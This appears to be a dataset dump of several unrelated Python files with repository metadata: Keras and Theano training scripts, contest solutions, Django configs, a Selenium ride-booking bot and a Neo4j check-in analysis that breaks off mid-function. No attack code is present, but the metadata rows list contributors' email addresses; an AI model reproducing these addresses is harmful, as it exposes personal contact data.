# for debugging
print('X(samples, timesteps, input_dim):', X_train.shape)
print('--------------------------------')
print('y(samples, timesteps, output_dim):', y_train.shape)
print('--------------------------------')
# Start training
model = Sequential()
# model.add(Embedding(features, output_dim=256))
model.add(LSTM(1024,
# input_length=TIME_STEPS, input_dim=INPUT_SIZE
input_shape=(X_train.shape[1], X_train.shape[2]),
batch_size=16,
return_sequences=True,
stateful=True))
model.add(Dropout(0.2))
model.add(LSTM(1024, return_sequences=True))
model.add(Dropout(0.2))
model.add(TimeDistributed(Dense(48, activation='softmax')))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
print(model.summary())
model.fit(X_train, y_train, epochs=2, batch_size=16)
model.save(sys.argv[2]) | [
"noreply@github.com"
] | b04901066.noreply@github.com |
96307be001607af1db86c041f17a8a334756c5dc | 0bcdf50443ce11216b2ca7651e18bba1fb27542d | /algorithm/BAEKJOON/20056.py | 381d10f0c840f0cdf146647baa3366b4467c5d14 | [] | no_license | qqyurr/TIL | d4bdf75bbec8c4140d8d898dfba4823de3bf3ce0 | efb689c2dcaaf1cfc1ff429e29fdb7294a770d2a | refs/heads/master | 2023-07-19T11:48:56.732651 | 2021-09-07T09:10:29 | 2021-09-07T09:10:29 | 280,100,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,276 | py | from collections import deque
import sys
sys.stdin = open('20056.txt')
dx = [-1, -1, 0, 1, 1, 1, 0, -1]
dy = [0, 1, 1, 1, 0, -1, -1, -1]
n, m, k = map(int, input().split())
q = deque()
a = [[deque() for _ in range(n)] for _ in range(n)]
for _ in range(m):
r, c, m, s, d = map(int, input().split())
a[r-1][c-1].append([m, s, d])
q.append([r-1, c-1])
for _ in range(k):
temp = []
qlen = len(q)
for _ in range(qlen):
x, y = q.popleft()
for _ in range(len(a[x][y])):
m, s, d = a[x][y].popleft()
nx = (s * dx[d] + x) % n
ny = (s * dy[d] + y) % n
q.append([nx, ny])
# 다음 좌표가 저장된 파이어볼
temp.append([nx, ny, m, s, d])
# 하나씩 불러와서 지도에 저장
for x, y, m, s, d in temp:
a[x][y].append([m, s, d])
for i in range(n):
for j in range(n):
# 좌표의 파이어볼이 겹치는 경우
if len(a[i][j]) > 1:
nm, ns, odd, even, flag = 0, 0, 0, 0, 0
for idx, [m, s, d] in enumerate(a[i][j]):
nm += m
ns += s
if idx == 0:
if d % 2 == 0:
even = 1
else:
odd = 1
else:
# even인데 홀수가 들어올경우
if even == 1 and d % 2 == 1:
flag = 1
# odd 인데 짝수가 들어오는 경우
elif odd == 1 and d % 2 == 0:
flag = 1
nm //= 5
ns //= len(a[i][j])
# 원래 파이어볼이 있던 자리 0으로 만들기
a[i][j] = deque()
# 질량이 0이 아니면 flag대로 좌표에 새로운 파이어볼 append
if nm != 0:
for idx in range(4):
nd = 2 * idx if flag == 0 else 2 * idx + 1
a[i][j].append([nm, ns, nd])
ans = 0
for i in range(n):
for j in range(n):
if a[i][j]:
for m, s, d in a[i][j]:
ans += m
print(ans) | [
"byyulli16@gmail.com"
] | byyulli16@gmail.com |
956b9ac7c34d007a7dc6d93c3d72f38c6fb20462 | d1ad5480919e7931566a6c581b289c8a834742ee | /day 052.py | 6ed3ae9b1672eafb21e8ad93ced939da89ee74d7 | [] | no_license | saraalrumih/100DaysOfCode | d92ae6add4cbbcab4fdfd3aa8579346bd2b678a0 | 12d7f44ce72cbda3722042a6b0956903256a8816 | refs/heads/master | 2020-07-06T22:10:21.421058 | 2019-10-27T16:14:48 | 2019-10-27T16:14:48 | 203,153,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | # datetime
import datetime as t
print("current date and time is: ",t.datetime.now())
print("current year is: ",t.datetime.now().year)
print("today is: ",t.datetime.now().strftime("%A")) | [
"361205433@qu.edu.sa"
] | 361205433@qu.edu.sa |
0c50d34d854feeffa085fafba16a05290be2289e | 687956ef9e06ff0e6571de732032f3833be4671c | /Motzkin/wsgi.py | 6c7a8917e5e704f254acc14d49d2731b7708f680 | [] | no_license | sgino209/cmr_django | e4e69f8bac5f45e013977bfb6c2f41e6db87cffe | cce65ffda45ecb14bb58a39bb6aa11a81661d589 | refs/heads/master | 2020-03-07T15:47:07.181033 | 2018-12-28T06:55:45 | 2018-12-28T06:55:45 | 127,564,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | # (c) Shahar Gino, April-2018, sgino209@gmail.com
#
# WSGI config for Motzkin project.
# It exposes the WSGI callable as a module-level variable named ``application``.
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Motzkin.settings")
application = get_wsgi_application()
#Add static serving using whitenoise
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
application = get_wsgi_application()
application = DjangoWhiteNoise(application)
| [
"noreply@github.com"
] | sgino209.noreply@github.com |
2b8ce93b4d397094a5f26ecd9b7517cd250b1515 | 923be7428b2a0d7920e53d2f87a1e65720ee0a8d | /tapride.py | 9899c40fb7877a94280568993fa02ffcda9e06b6 | [] | no_license | shaeqahmed/tapride_terminal | 0b10020974a563928f64917a7ef320f5dae0d894 | c57a2d37d5174f1b5c3dfd307173b0d68cf6c9ba | refs/heads/master | 2021-05-08T12:22:01.073799 | 2018-02-02T07:03:01 | 2018-02-02T07:03:01 | 119,943,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,292 | py | from selenium import webdriver
import getpass
import os, time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.remote.webdriver import WebDriver
def WebElement_click(self):
self._parent.execute_script("arguments[0].click();", self)
WebElement.click = WebElement_click
def WebDriver_find_element_by_xpath(self, x):
x = WebDriverWait(self, 10).until(
EC.presence_of_element_located((By.XPATH, x))
)
return x
WebDriver.find_element_by_xpath = WebDriver_find_element_by_xpath
os.system('cls' if os.name == 'nt' else 'clear')
print("####### ###### ")
print(" # ## ##### # # # ##### ###### ")
print(" # # # # # # # # # # # ")
print(" # # # # # ###### # # # ##### ")
print(" # ###### ##### # # # # # # ")
print(" # # # # # # # # # # ")
print(" # # # # # # # ##### ######\n ")
chromedriver = "<INSERT PATH TO CHROMEDRIVER EXECUTABLE>"
os.environ["webdriver.chrome.driver"] = chromedriver
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = '/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary'
driver = webdriver.Chrome(chromedriver, chrome_options=chrome_options)
word = getpass.getpass("UMICH Password:")
pickup_addr = input("\nWhat is your pickup location?\n")
dropoff_addr = input("\nWhat is your dropoff location?\n")
for i in range(3):
try:
driver.get("https://tapride-umich.herokuapp.com/ride/")
login = driver.find_element_by_xpath('//*[@id="ride-wrapper"]/div[8]/div/div[1]/div/button')
login.click()
login = driver.find_element_by_xpath('/html/body/a')
login.click()
user = driver.find_element_by_xpath('//*[@id="login"]')
user.send_keys("<CHANGE TO UNIQNAME>")
passw = driver.find_element_by_xpath('//*[@id="password"]')
passw.send_keys(word)
submit = driver.find_element_by_xpath('//*[@id="loginSubmit"]')
submit.click()
time.sleep(1)
request = driver.find_element_by_xpath('//button[text()="REQUEST RIDE"]')
request.click()
pickup = driver.find_element_by_xpath('//*[@id="pickup-location-input"]')
pickup.send_keys(pickup_addr)
choice = driver.find_element_by_xpath('/html/body/div[3]/div[2]/ul/li[1]/span')
choice.click()
dropoff = driver.find_element_by_xpath('//*[@id="dropoff-location-input"]')
dropoff.send_keys(dropoff_addr)
time.sleep(1)
choice = driver.find_element_by_xpath('/html/body/div[3]/div[2]/ul/li[1]/span')
choice.click()
order = driver.find_element_by_xpath('//*[@id="ride-wrapper"]/div[8]/div/div[6]/div[2]/button')
order.click()
order = driver.find_element_by_xpath('//*[@id="ride-wrapper"]/div[9]/div/div[7]/div[2]/button')
print("\n"+order.text+" DONE")
order.click()
driver.quit()
break
except:
print("\nHold up retrying..")
driver.quit()
driver = webdriver.Chrome(chromedriver, chrome_options=chrome_options)
| [
"shaeqahmed@gmail.com"
] | shaeqahmed@gmail.com |
8820d893612534fb30bc6e6550996ec98b34c200 | 3f9f05433dde1e33d66689733b2ce891c8d35247 | /blog/migrations/0002_auto_20210224_1055.py | fda3e600254bb2895f561278e9ea3f73c7fca32d | [] | no_license | xiejiaqi77/personal_portfolio_project_fomal | 43fd28fab5e94a8f467b474a9a37ea44cea52b74 | 1a7c7f527ede26f960f93c9418e09137807dc3ff | refs/heads/main | 2023-03-07T11:30:38.176231 | 2021-02-28T08:07:58 | 2021-02-28T08:07:58 | 342,579,720 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 669 | py | # Generated by Django 3.1.7 on 2021-02-24 10:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Blog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('description', models.TextField()),
('date', models.DateField()),
],
),
migrations.DeleteModel(
name='Project',
),
]
| [
"xiejiaqi77.job@gmail.com"
] | xiejiaqi77.job@gmail.com |
be626dc75c2e4e659d9d6d88ed5ec75010b1efb4 | 493315999125ea93f20b0a49aa63a2cd0092c068 | /gru-lm/train.py | d540d339e36ab6c6d73290f2ab35dd1f641f2503 | [] | no_license | cfifty/quotationGeneration | 3c5af5aa84d2a53054fbefeecd7f63f04f0cb219 | 66c8079139e6fe1e1128c7f38560ec7bc4287c3e | refs/heads/master | 2020-03-08T23:27:32.632058 | 2018-06-16T03:06:05 | 2018-06-16T03:06:05 | 128,464,737 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,680 | py | #! /usr/bin/env python
import sys
import os
import time
import numpy as np
from utils import *
from datetime import datetime
from gru_theano import GRUTheano
LEARNING_RATE = float(os.environ.get("LEARNING_RATE", "0.001"))
VOCABULARY_SIZE = int(os.environ.get("VOCABULARY_SIZE", "3000"))
EMBEDDING_DIM = int(os.environ.get("EMBEDDING_DIM", "48"))
HIDDEN_DIM = int(os.environ.get("HIDDEN_DIM", "128"))
NEPOCH = int(os.environ.get("NEPOCH", "1000"))
MODEL_OUTPUT_FILE = os.environ.get("MODEL_OUTPUT_FILE")
INPUT_DATA_FILE = os.environ.get("INPUT_DATA_FILE", "./data/ciceroquotes.csv")
PRINT_EVERY = int(os.environ.get("PRINT_EVERY", "3000"))
if not MODEL_OUTPUT_FILE:
ts = datetime.now().strftime("%Y-%m-%d-%H-%M")
MODEL_OUTPUT_FILE = "GRU-%s-%s-%s-%s.dat" % (ts, VOCABULARY_SIZE, EMBEDDING_DIM, HIDDEN_DIM)
# compute the perplexity of a pre-loaded model
x_train, y_train, word_to_index, index_to_word = load_data(INPUT_DATA_FILE, VOCABULARY_SIZE)
model = load_model_parameters_theano('./data/gru-theano-2018-05-18-16-13-00.npz')
# print("here is your perplexity " + str(calc_perplexity(model,index_to_word,word_to_index)))
generate_sentences(model, 100, index_to_word, word_to_index)
# uncomment to train a new model
'''
# Load data
x_train, y_train, word_to_index, index_to_word = load_data(INPUT_DATA_FILE, VOCABULARY_SIZE)
# Build model
model = GRUTheano(VOCABULARY_SIZE, hidden_dim=HIDDEN_DIM, bptt_truncate=-1)
# Print SGD step time
t1 = time.time()
model.sgd_step(x_train[10], y_train[10], LEARNING_RATE)
t2 = time.time()
print "SGD Step time: %f milliseconds" % ((t2 - t1) * 1000.)
sys.stdout.flush()
# We do this every few examples to understand what's going on
def sgd_callback(model, num_examples_seen):
global loss_lst
dt = datetime.now().isoformat()
loss = model.calculate_loss(x_train[:10000], y_train[:10000])
print("\n%s (%d)" % (dt, num_examples_seen))
print("--------------------------------------------------")
print("Loss: %f" % loss)
# generate_sentences(model, 10, index_to_word, word_to_index)
# save_model_parameters_theano(model, MODEL_OUTPUT_FILE)
time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
save_model_parameters_theano(model,"./data/gru-theano-%s.npz" % (time))
print("\n")
loss_lst.append((num_examples_seen,loss))
with open("gru_losses.csv","wb") as f:
for num_examples,loss in loss_lst:
f.write("num_examples: " + str(num_examples) + " : loss: " + str(loss) + ",\n")
sys.stdout.flush()
loss_lst = []
for epoch in range(NEPOCH):
train_with_sgd(model, x_train, y_train, learning_rate=LEARNING_RATE, nepoch=1, decay=0.9,
callback_every=PRINT_EVERY, callback=sgd_callback)
'''
| [
"cjf92@cornell.edu"
] | cjf92@cornell.edu |
fb9705a0d1b4b5da9c80db0e6507fd386d90b160 | f28a261132fbf98f5ebfd004672af4155dfa1cc5 | /nanodash/service/dataset-description-nano-090.py | b6fd62ced21821aab7733a8570b3d22d64d38b3d | [
"Apache-2.0",
"MIT"
] | permissive | curtislisle/nanomaterial-dashboard | 8704779b7410747092c8fdb9326fb69b9f6b94ff | 06de2e0782f53ce56d6edd0937b14cbd738fc22a | refs/heads/master | 2021-01-21T04:41:16.713855 | 2016-07-08T01:07:17 | 2016-07-08T01:07:17 | 54,521,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,213 | py | #import bson
import pymongo
import json
from bson import ObjectId
from pymongo import MongoClient
import string
import tangelo
def run(ipaddress):
    """Assemble the dataset-description payload for the nanomaterial
    dashboard and return it serialised as a JSON string.

    `ipaddress` is the host serving the dataset-content endpoint; it is
    embedded into the `file` URL of the response.
    """
    content_url = ("http://" + str(ipaddress) +
                   ":8080/nanodash/service/dataset-content-nano-090/NanoDB3/Nano_combined_0301")
    # Column metadata: the id column, the categorical columns, then the
    # numeric measurement columns.
    meta_columns = [
        {"type": "id", "name": "NanomaterialID"},
        {"type": "string", "name": "Molecular Identity"},
        {"type": "string", "name": "Material Type"},
        {"type": "string", "name": "Molecular Type"},
        {"type": "string", "name": "Product Name"},
        {'name': 'Mean Primary Particle Size', 'type': 'float'},
        {'name': 'Lambda Max', 'type': 'float'},
        {'name': 'Specific Surface Area', 'type': 'float'},
        {'name': 'Zeta Potential', 'type': 'float'},
    ]
    # Names of the binary set-membership columns (columns 1-5 of the file
    # per the `sets` entry below).
    set_names = ['2D Dimensionality', '3D Dimensionality', 'Metal', 'Metal Oxide',
                 'Polymer', 'Carbohydrate', 'Protein', 'Nucleic Acid',
                 'Group Ii-Vi', 'Dendrimer', 'Lipid', 'Group Iv - Non C',
                 'Agglomerated', 'Aggregated', 'Positive Polarity',
                 'Negative Polarity', 'Purity99+', 'IsCrystalline', 'Aromatic',
                 'Macrocyclic', 'Sugar', 'VHQ-R subset', 'UHQ-R subset',
                 'source_pdf', 'source_nano_db']
    response = {
        'datasource': 'remote',
        'file': content_url,
        'name': "Nano Database Dashboard v0.9.0",
        'separator': ',',
        'skip': 0,
        'meta': meta_columns,
        'sets': [{"format": "binary", "start": 1, "end": 5}],
        'setlist': set_names,
        'attributelist': [],
        'author': 'ABCC IVG & KnowledgeVis',
        'description': 'Nanomaterial database v2',
        'source': "Nanomaterials reference database",
    }
    return json.dumps(response)
| [
"clisle@knowledgevis.com"
] | clisle@knowledgevis.com |
e6aaf834c6ccd10cab9af9a5c349ed26c8c12144 | e43c92c0d0ac8b979801c17a1ef316d04cdc0e74 | /Train/0520_DQN23_run.py | d4746a9730d69f544223b406f54759b2e724a433 | [] | no_license | DengNanshan/DnsEnv | 86c358b835ec523931ba84accf5970eda2752f06 | 437727c7d5cdc023ab9c6bb58c8923e54a382176 | refs/heads/main | 2023-06-17T17:00:43.509283 | 2021-07-13T10:08:39 | 2021-07-13T10:08:39 | 366,282,626 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,533 | py | import gym
# import tkinter as tk
import highway_env
import matplotlib
from matplotlib import pyplot as plt
from stable_baselines.deepq.policies import MlpPolicy
from stable_baselines import DQN
import torch as th
from stable_baselines3.common.callbacks import EvalCallback, CallbackList,CheckpointCallback
import datetime
config = {
"observation": {
"type": "Kinematics",
"vehicles_count": 2, # !!!!!!!!!!!!
# "features": ["presence", "x", "y", "vx", "vy", "cos_h", "sin_h"],
"features": ["x", "y", "vx","vy"],
"features_range": {
"x": [-100, 100],
"y": [-10, 10],
"vx": [-30, 30],
"vy": [-30, 30],
},
"absolute": False,
"order": "sorted"
},
"action": {
"type": "DiscreteMetaAction",
},
"lanes_count": 2,
"initial_lane_id": None,
"vehicles_count": 5, # ! !!!!!!!!!!!
"controlled_vehicles": 1,
"duration": 50, # [step] # !!!!!!!!!!!!!!
"ego_spacing": 2,
"initial_spacing": 2,
"collision_reward": -1000, # The reward received when colliding with a vehicle.
"reward_speed_range": [0, 30], # [m/s] The reward for high speed is mapped linearly from this range to [0, HighwayEnv.HIGH_SPEED_REWARD].
"right_lane_reward": 0, # The reward received when driving on the right-most lanes, linearly mapped to
# zero for other lanes.
"high_speed_reward": 1, # The reward received when driving at full speed, linearly mapped to zero for
# lower speeds according to config["reward_speed_range"].
"simulation_frequency": 10, # [Hz]
"policy_frequency": 1, # [Hz]
"other_vehicles_type": "highway_env.vehicle.behavior.IDMVehicle",
"screen_width": 600, # [px]
"screen_height": 150, # [px]
"centering_position": [0.3, 0.5],
"scaling": 5.5,
"show_trajectories": False,
"render_agent": True,
"offscreen_rendering": False,
"vehicles_density": 1,
"offroad_terminal": False
}
env = gym.make('highway-v0')
env.configure(config)
env.reset()
#
#
# model= DQN(MlpPolicy,env,verbose=1,
# tensorboard_log="../../Data/tensorboard_log_fello/",
# exploration_fraction= 0.1,
# exploration_initial_eps = 1.0,
# exploration_final_eps= 0.05,
# learning_rate=0.01,
# learning_starts=100,
# gamma=0.9)
# timetemp=datetime.datetime.now().strftime("DQN23%Y_%m_%d_%H_%M_%S")
# checkpoint_callback=CheckpointCallback(save_freq=1000, save_path='../../Data/'+timetemp,name_prefix='deeq_highway_check')
# E=EvalCallback(eval_env=env,eval_freq=1000,log_path='../../Data/'+timetemp,best_model_save_path='../../Data/'+timetemp)
# callbacks=CallbackList([checkpoint_callback])
# # model.learn(300000,callback=callbacks)
# model.learn(300000)
# model.save('../../Data/DQN23')
#
# del model
'''
ACTIONS_ALL = {
0: 'LANE_LEFT',
1: 'IDLE',
2: 'LANE_RIGHT',
3: 'FASTER',
4: 'SLOWER'
}
'''
# model=DQN.load(('../../Data/DQN23'),env)
# obs=env.reset()
# i=0
# ve=[]
for i in range(1000):
# action, _state = model.predict(obs)
# action=int(action)
# print('action',action)
# print(action,_state)
# print(type(action))
obs,reward,dones,info=env.step(1)
print('reward',reward)
ego_speed=obs[0,1]*30
# ve.append(ego_speed)
f_speed=obs[1,1]*30+ego_speed
# print(ego_speed,f_speed)
# print(obs,reward,dones,info)
env.render()
| [
"374450833@qq.com"
] | 374450833@qq.com |
e173dd44edd47d50ac75298a2927da10f8cb5fc5 | a95236e2dccd588627c6f0a1542f37e26f6899f3 | /Chap04Functions/3-1-1.函数对象.py | a969ddb2ef7cb3670e7c3c086c3b5e4d44527a9f | [
"MIT"
] | permissive | royqh1979/programming_with_python | 43b1cf0ab1b6a54ad165e30991250cf7bf318bd6 | aa0603058f40b5bc7406e92c92134ee34f3b15e2 | refs/heads/master | 2023-06-11T02:11:59.590880 | 2023-05-29T06:39:03 | 2023-05-29T06:39:03 | 166,190,796 | 5 | 4 | MIT | 2023-02-15T23:13:33 | 2019-01-17T08:38:56 | Python | UTF-8 | Python | false | false | 70 | py | def fun1():
print("this is fun1")
print(fun1)
fun1=34
print(fun1) | [
"royqh1979@gmail.com"
] | royqh1979@gmail.com |
a7e5d71518933fffd99a1fd2d4e413d27c086d7f | 4cb06a6674d1dca463d5d9a5f471655d9b38c0a1 | /am5801/Assignment1/Problem1.py | 499514bdcc6f160059a3347a3ce4c3d82ccbbaf0 | [] | no_license | nyucusp/gx5003-fall2013 | 1fb98e603d27495704503954f06a800b90303b4b | b7c1e2ddb7540a995037db06ce7273bff30a56cd | refs/heads/master | 2021-01-23T07:03:52.834758 | 2013-12-26T23:52:55 | 2013-12-26T23:52:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | # Awais Malik
# Assignment 1
# Problem 1
import sys
first = int(sys.argv[1])
last = int(sys.argv[2])
# Function for creating 3n+1 chain and return length of chain
def collatz(n):
    """Return the length of the Collatz (3n+1) chain starting at `n`.

    The chain includes both the starting value and the final 1, so
    collatz(6) == 9 (6, 3, 10, 5, 16, 8, 4, 2, 1) and collatz(1) == 1.

    Fixes over the original:
    - collatz(1) returned None (the loop never ran and nothing was
      appended); it now correctly returns 1.
    - values < 1 silently returned None; the "positive integer" message
      lived inside the while loop where it could never be reached. The
      guard now runs before the loop (None is still returned, as before).
    - the unreachable "Invalid input." branch was removed.
    """
    if n < 1:
        print("Please type a positive integer!")
        return None
    # Count the starting value, then one step per transformation.
    length = 1
    while n > 1:
        if n % 2 == 0:
            n //= 2  # floor division keeps n an int on both Python 2 and 3
        else:
            n = 3 * n + 1
        length += 1
    return length
# Function to measure max length of chain in given range
def user_collatz(a, b):
    """Print "a b L" where L is the longest Collatz chain length for any
    starting value in the inclusive range [a, b].

    Fixes over the original: collatz(i) was computed twice per value (once
    for the comparison, once for the assignment); each chain is now
    computed once. The Python-2-only `print a, b, m` statement was replaced
    by a %-formatted call that prints the same "a b L" text on both
    Python 2 and Python 3.
    """
    max_length = collatz(a)
    for i in range(a, b + 1):
        length = collatz(i)
        if length > max_length:
            max_length = length
    print("%d %d %d" % (a, b, max_length))
user_collatz(first, last) | [
"am5801@nyu.edu"
] | am5801@nyu.edu |
7c37d3fe89b357199a890b171f09627e3c643ac9 | 74176f2d4c18a9189714f8532bcac9b6ccd575dc | /verify70_30_v3.py | cd2d47a3923c7f0c2e05b5a3f705156798bcfc65 | [] | no_license | wsgan001/SocialInfluenceResearch | 9840f9aa28e7dcd32f041b6e47471251d6aa5457 | 73daf0f3d1ace4d4677b553712cd8e6648c61473 | refs/heads/master | 2020-03-09T15:31:10.191131 | 2015-02-18T08:06:39 | 2015-02-18T08:06:39 | 128,861,092 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,179 | py | from py2neo import Graph
from py2neo import Node, Relationship
import os
import itertools
from os import listdir
import json
import time
import cPickle as pickle
from copy import deepcopy
import sys
import re
import operator
import math
from random import shuffle
from py2neo.packages.httpstream import http
http.socket_timeout = 9999
datasetName = sys.argv[1]
def getMFLocation(uid):
    """Return (latitude, longitude) of the user's most frequently visited
    place, or False when the user has no check-ins.

    Node labels in the Neo4j queries depend on the module-level
    `datasetName`; `graph` is the module-level py2neo Graph.

    Fix: the original initialised a place's count to 0 on its first
    occurrence instead of 1, so every count was off by one (the ranking,
    and therefore the result, was unaffected, but the counts were wrong).
    `collections.Counter` now does the counting correctly.
    """
    from collections import Counter
    # Map the dataset name onto the node labels used in the graph.
    if(datasetName == 'FB'):
        user_label, place_label = 'User', 'Place'
    elif(datasetName == 'FS'):
        user_label, place_label = 'FSUser', 'FSPlace'
    elif(datasetName == 'GWL'):
        user_label, place_label = 'GWLUser', 'GWLPlace'
    elif(datasetName == 'CA'):
        user_label, place_label = 'CAUser', 'CAPlace'
    locs = graph.cypher.execute(
        "MATCH (n:%s {id:{uid}})-[:VISITED]->(p:%s) RETURN p.id;" % (user_label, place_label),
        {"uid": uid})
    if(len(locs) == 0):
        return False
    # Most-frequent place id (ties resolved by first occurrence).
    counts = Counter(loc['p.id'] for loc in locs)
    top_place = counts.most_common(1)[0][0]
    landl = graph.cypher.execute(
        "MATCH (p:%s {id:{pid}}) RETURN p.latitude,p.longitude;" % place_label,
        {"pid": top_place})
    # The query returns at most one row; return its coordinate pair.
    for x in landl:
        return x['p.latitude'], x['p.longitude']
def distance_on_unit_sphere(lat1, long1, lat2, long2):
    """Great-circle distance in kilometres between two (lat, long) points,
    using the spherical law of cosines and an Earth radius of 6373 km.
    """
    # Latitude -> polar angle (phi = 90 - latitude), longitude -> azimuth,
    # both converted from degrees to radians.
    polar1 = math.radians(90.0 - lat1)
    polar2 = math.radians(90.0 - lat2)
    azimuth1 = math.radians(long1)
    azimuth2 = math.radians(long2)
    # cosine(arc length) = sin phi sin phi' cos(theta - theta') + cos phi cos phi'.
    # Round to 10 decimal places so floating-point noise cannot push the
    # value outside acos's [-1, 1] domain.
    cos_angle = (math.sin(polar1) * math.sin(polar2) * math.cos(azimuth1 - azimuth2)
                 + math.cos(polar1) * math.cos(polar2))
    central_angle = math.acos(round(cos_angle, 10))
    # Arc length on the unit sphere times Earth's radius in km.
    return central_angle * 6373
# get top 10%
def getTop10User(dataset):
    """Return the file names (one per user) of the top 10% most-followed
    users for the given dataset, ranked by total follow count (descending).

    Each per-user CSV line is "idx,count,[distances],[times]"; lines with
    idx > 99 terminate that file's scan, as in the original.

    Fixes over the original:
    - the `dataset` parameter was ignored in favour of the global
      `datasetName`; the only call site passes `datasetName`, so using the
      parameter is equivalent and makes the function self-contained.
    - file handles were opened and never closed; a `with` block now
      closes them.
    - an empty result set raised IndexError when slicing the top 10%;
      an empty list is now returned instead.
    - Python-2-only `xrange` replaced by slicing; unused accumulators
      (disDic, sumCount, timelist, dislist) removed.
    """
    path = '/home/ytwen/observationData_follower_one/v2/' + dataset
    line_re = re.compile(r'(.*)\,(.*)\,(\[.*\])\,(\[.*\])')
    followDic = {}
    for followdata in listdir(path):
        # Skip the summary file and plot/distance artefacts in the folder.
        if followdata == 'sumData.csv' or '.png' in followdata or 'distance' in followdata:
            continue
        followCount = 0
        with open(path + '/' + followdata) as f:  # original leaked the handle
            for line in f:
                m = line_re.match(line)
                if m is None:
                    continue
                if int(m.group(1)) > 99:
                    break
                followCount = followCount + int(m.group(2))
                json.loads(m.group(3))  # validate the distance column, as before
        if followCount > 0:
            followDic[followdata] = followCount
    ranked = sorted(followDic.items(), key=operator.itemgetter(1), reverse=True)
    rangelimit = int(0.1 * len(ranked))
    # Top 10%, always at least one entry when any user qualified
    # (matching the original's `rangelimit + 1`).
    return [name for name, _ in ranked[:rangelimit + 1]]
def getPeriodmarker(uid):
    """Return the timestamp splitting this user's check-in history 70/30.

    Queries the earliest and latest check-in times for `uid` (node labels
    depend on the module-level `datasetName`; `graph` is the module-level
    py2neo Graph) and returns start + 0.7 * (end - start).
    """
    # One query variant per dataset because each dataset uses its own
    # Neo4j node labels.
    if(datasetName == 'FB'):
        q = graph.cypher.execute("MATCH (n:User {id:{uid}})-[r:VISITED]->(p:Place) RETURN max(r.atTime),min(r.atTime)",{"uid":uid})
    elif(datasetName == 'FS'):
        q = graph.cypher.execute("MATCH (n:FSUser {id:{uid}})-[r:VISITED]->(p:FSPlace) RETURN max(r.atTime),min(r.atTime)",{"uid":uid})
    elif(datasetName == 'GWL'):
        q = graph.cypher.execute("MATCH (n:GWLUser {id:{uid}})-[r:VISITED]->(p:GWLPlace) RETURN max(r.atTime),min(r.atTime)",{"uid":uid})
    elif(datasetName == 'CA'):
        q = graph.cypher.execute("MATCH (n:CAUser {id:{uid}})-[r:VISITED]->(p:CAPlace) RETURN max(r.atTime),min(r.atTime)",{"uid":uid})
    # First (only) row carries the aggregated max/min check-in times.
    # NOTE(review): with an unknown datasetName, `q` is unbound here.
    endTime = float(q[0]['max(r.atTime)'])
    startTime = float(q[0]['min(r.atTime)'])
    # 70% point of the observation window (train/test split boundary).
    periodmarker = startTime+0.7*(endTime - startTime)
    return periodmarker
def getGlobalPeriodmarker():
    """Return the timestamp splitting the whole dataset's check-ins 70/30.

    Same computation as getPeriodmarker, but over every user's check-ins
    (no {uid} filter in the queries). Uses the module-level `datasetName`
    and `graph`.
    """
    if(datasetName == 'FB'):
        q = graph.cypher.execute("MATCH (n:User )-[r:VISITED]->(p:Place) RETURN max(r.atTime),min(r.atTime)")
    elif(datasetName == 'FS'):
        q = graph.cypher.execute("MATCH (n:FSUser)-[r:VISITED]->(p:FSPlace) RETURN max(r.atTime),min(r.atTime)")
    elif(datasetName == 'GWL'):
        q = graph.cypher.execute("MATCH (n:GWLUser)-[r:VISITED]->(p:GWLPlace) RETURN max(r.atTime),min(r.atTime)")
    elif(datasetName == 'CA'):
        q = graph.cypher.execute("MATCH (n:CAUser)-[r:VISITED]->(p:CAPlace) RETURN max(r.atTime),min(r.atTime)")
    # First (only) row carries the aggregated max/min check-in times.
    endTime = float(q[0]['max(r.atTime)'])
    startTime = float(q[0]['min(r.atTime)'])
    # 70% point of the global observation window.
    periodmarker = startTime+0.7*(endTime - startTime)
    return periodmarker
def getAllUserCheckin(uid):
    """Fetch every (check-in time, place id) row for the given user.

    Node labels depend on the module-level `datasetName`; `graph` is the
    module-level py2neo Graph.

    Fix: the original executed the query and discarded the result (the
    function implicitly returned None); the rows are now returned so
    callers can actually use them. Adding the return is backward
    compatible because the previous return value was never usable.
    """
    if(datasetName == 'FB'):
        q = graph.cypher.execute("MATCH (n:User {id:{uid}})-[r:VISITED]->(p:Place) RETURN r.atTime,p.id;",{"uid":uid})
    elif(datasetName == 'FS'):
        q = graph.cypher.execute("MATCH (n:FSUser {id:{uid}})-[r:VISITED]->(p:FSPlace) RETURN r.atTime,p.id;",{"uid":uid})
    elif(datasetName == 'GWL'):
        q = graph.cypher.execute("MATCH (n:GWLUser {id:{uid}})-[r:VISITED]->(p:GWLPlace) RETURN r.atTime,p.id;",{"uid":uid})
    elif(datasetName == 'CA'):
        q = graph.cypher.execute("MATCH (n:CAUser {id:{uid}})-[r:VISITED]->(p:CAPlace) RETURN r.atTime,p.id;",{"uid":uid})
    return q
def randomSampleData(userfollowData, marker):
    """Randomly split the follow records into a (train, test) pair.

    `marker` is the desired training-set size (a float is truncated to an
